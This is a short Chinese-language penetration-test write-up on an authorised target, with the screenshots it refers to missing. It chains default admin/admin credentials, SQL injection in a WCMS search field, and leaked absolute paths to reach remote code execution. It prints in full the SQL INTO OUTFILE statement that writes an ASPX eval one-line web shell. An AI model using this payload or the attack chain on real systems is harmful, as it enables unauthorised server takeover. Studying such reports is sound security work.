前言:
在经过授权的情况下,对指定IP进行测试。
在前期信息收集中,找到xxx.xxx.xxx.xxx开放的端口和弱口令进入后台,并发现后台中有sql注入。这些的危害都不小,但依然没有getshell。
信息收集
峰回路转
直到在crocus系统中找到一个有意思的界面。
crocus
日志下载。。
绝对路径
绝对路径。如果配合之前的sql注入点利用sqlmap的sqlshell写一句话木马就好啦。
之前的sql注入点是在这个文件管理的地方。
文件类型
大概在文件类型中有注入点。
keyType
那现在先把日志若暴露的绝对路径收集一下。
路径
还有很多,就不写啦。。
那现在首先可以确定是在CMS Server路径下面。可到底是哪个呢。。也没有crocus相关的文件名。思考半天,无果。
转念之间。。我看到了什么。
wcms
这个感觉好像在哪见过。。
wcms
12055的端口。默认密码admin,admin,登录进还有SQL注入。可以利用这个的注入写shell啊。
车牌号搜索有SQL注入。
ok
true
Ok,有注入,有权限,有绝对路径。激动。。
sql-shell
一激动怎么还把php写上啦。
php
没毛病,写进入啦。。getshell不在话下。
getshell
改为aspx一句话木马
into outfile
select '<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'
再次访问。
success
success
总结:
这次成功getshell可并不太容易,可以说是高位端口扫描、弱口令、SQL注入、文件下载共同完成了这次渗透。
